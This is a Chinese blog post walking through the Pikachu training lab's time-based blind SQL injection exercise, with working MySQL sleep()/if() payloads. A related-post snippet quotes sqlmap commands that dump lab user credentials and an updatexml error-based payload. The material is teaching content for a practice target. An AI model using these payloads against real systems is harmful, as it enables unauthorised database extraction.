Pikachu-Sql-Inject - 基于时间的盲注

已于 2024-10-04 01:04:45 修改
阅读量488 收藏
点赞数 2
分类专栏: pikachu通关 文章标签: sql 数据库 sql 注入
于 2024-10-04 00:08:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanrongl/article/details/142697969
版权

基于时间的盲注:

就是前端的基于time 的盲注,什么错误信息都看不到,但是还可以通过特定的输入,判断后台的执行时间,从而确定注入。

mysql 里函数sleep() 是延时的意思,sleep(10)就是数据库延时10 秒返回内容。判断注入可以使用'and sleep(10) 数据库延时10 秒返回值网页响应时间至少要10 秒根据这个原理来判断存在SQL 时间注入。

mysql 延时注入用到的函数sleep() 、if()、substring()、select if(2>1,sleep(10),0) 2>1 这个部分就是你注入要构造的SQL 语句。
 

//这个就是查询当前库大于1 就会延时5 秒
执行。
select if(length(database())>1,sleep(5),0) 
//可以看到网页是大于五秒返回。根据这个原理length>1 , length不延时就能确定当前数据库的长度了。
-1' or if(length(database())>1,sleep(5),0)--+

构造payload ;如果数据库长度大于1 ,延时五秒返回;

vince' and if(length(database())>1,sleep(5),0)#

根据这个条件,可以逐个爆破表;

什么鬼昵称
关注
专栏目录
pikachu靶场-SQL-Inject
braty_的博客
02-23 1326
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
Pikachu-Sql-Inject -基于boolian的盲注
guanrongl的专栏
10-03 664
布尔型盲注入用到得SQL 语句select if(1=1,1,0) if()函数在mysql 是判断,第一个参数表达式,如果条件成立,会显示1,否则显示0。从前面已经知道有个用户 为 vince ,如果长度判断正确,回返回vince 这个用户,错误则显示不存在;if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0。2、不管是正确的输入,还是错误的输入,都只显示两种情况,true or false;第一个 1 ,代表查第一张表,第二个1,1 代表查第一个字母;
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2793
Pikachu-----Sql Inject(SQL注入
Pikachu靶场--Sql Inject
qq_65150735的博客
06-30 1137
Pikachu靶场--Sql Inject(SQL注入)
Pikachu-Sql Inject
baynk的博客
11-19 1036
0x00 Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后...
Pikachu靶场-SQL-Inject
梦里明明有六趣,觉后空空无大千
12-29 610
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
pikachu靶场 SQL-inject
Al_1的博客
10-03 969
数字型注入,字符型注入,搜索型注入,xx型注入,增改注入,删除注入,请求头注入,布尔盲注时间盲注,宽字节盲注
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5258
Pikachu靶场–Sql
pikachu-SQL-Inject
Cwillchris的博客
10-31 216
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、数字型注入 下拉菜单,没有输入界面,那直接BP抓包,修改id参数为 adn 1=1测试 输入 1 or 1=1 测试 如下,直接爆出所有用户 直接用三板斧干就行。 二、字符型注入(get) 输入 kobe' or 1=1#,成功列出所有id,由于是构造闭合,是字符型注入 后续爆破就行 三、搜索
pikachu通关教程(SQL-inject
Bu2n的博客
12-09 1079
每天只做一题
基于pikachu漏洞平台的 --SQL注入攻击学习与总结
Mr.hu
10-16 1674
SQL注入攻击 基础知识 常见注释符号(官方链接): mysql> SELECT 1+1; # 行内注释 mysql> SELECT 1+1; -- 行内注释 mysql> SELECT 1 /*行内注释 */ + 1; mysql> SELECT 1+ /* 多行注释 */ 1; mysql> SELECT * FROM table1 WHERE a=1 /*! AND b=2 */ 其中/*! */ 里面的语句会被MySQL识别并执行,但是会被其他系统
【Web安全从入门到放弃】04_Sql-Inject漏洞
xhxtalent的博客
12-08 428
04_Sql-Inject漏洞 【Web安全从入门到放弃】01_暴力破解漏洞 【Web安全从入门到放弃】02_跨站脚本漏洞 【Web安全从入门到放弃】03_跨站请求伪造漏洞 SQL Inject漏洞原理概述 在owasp发布的top 10漏洞里面,注入漏洞一直是危害排名第一,其中主要指SQL Inject漏洞。 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 攻击
pikachu平台之sql注入
qq_42728977的博客
12-24 740
参考链接 原理 SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 基本流程 1.2SQL注入攻击流程 第一步:注入点探测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造SQL注入测试语句进行注入点发现 第二步:信息获取 通过...
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 624
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
如何在 SQL 中插入一条新记录 ?
最新发布
程序员学习园地。
10-06 379
在日常的软件开发过程中,我们经常需要与数据库进行交互,其中一项常见的操作就是向数据库表中插入新的数据。SQL 语言提供了语句来实现这个功能。下面我会以通俗易懂的方式介绍如何使用这条命令,并提供一些实际开发中的建议和注意事项。
SQL进阶技巧:如何优雅求解指标累计去重问题?
石榴姐yyds
10-02 887
本文给出了计算指标按照日期字段进行累计去重的优雅解法,文中采用了2种解法,一种借助于分析函数作为辅助变量生成状态标记求解,一种利用自关联生成全量数据进行行行比较求解,两种方式都非常巧妙。
SQL自学:什么是SQL的聚集函数,如何利用它们汇总表的数据
Nervousr的博客
10-03 1040
SQL(Structured Query Language,结构化查询语言)中,聚集函数也称为聚合函数,是对一组值进行计算并返回单一值的函数。
【PostgreSQL】提高篇——深入讨论约束(如 NOT NULL、CHECK、FOREIGN KEY)的使用及其对数据完整性的影响
thinking_chou的专栏
10-02 887
约束在数据库设计中起着至关重要的作用。通过使用NOT NULLCHECK和约束,可以有效地维护数据完整性、实施业务规则、减少错误和提高性能。了解这些约束的使用和影响,可以帮助开发者设计出更健壮和可靠的数据库系统。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu --tables。 2. 然后,您可以使用以下命令来查询指定表名(例如users)的字段(例如username和password)并导出结果:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu -T users -C username,password --dump。 3. 如果您需要爆出数据库名为pikachu,您可以使用以下命令:a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值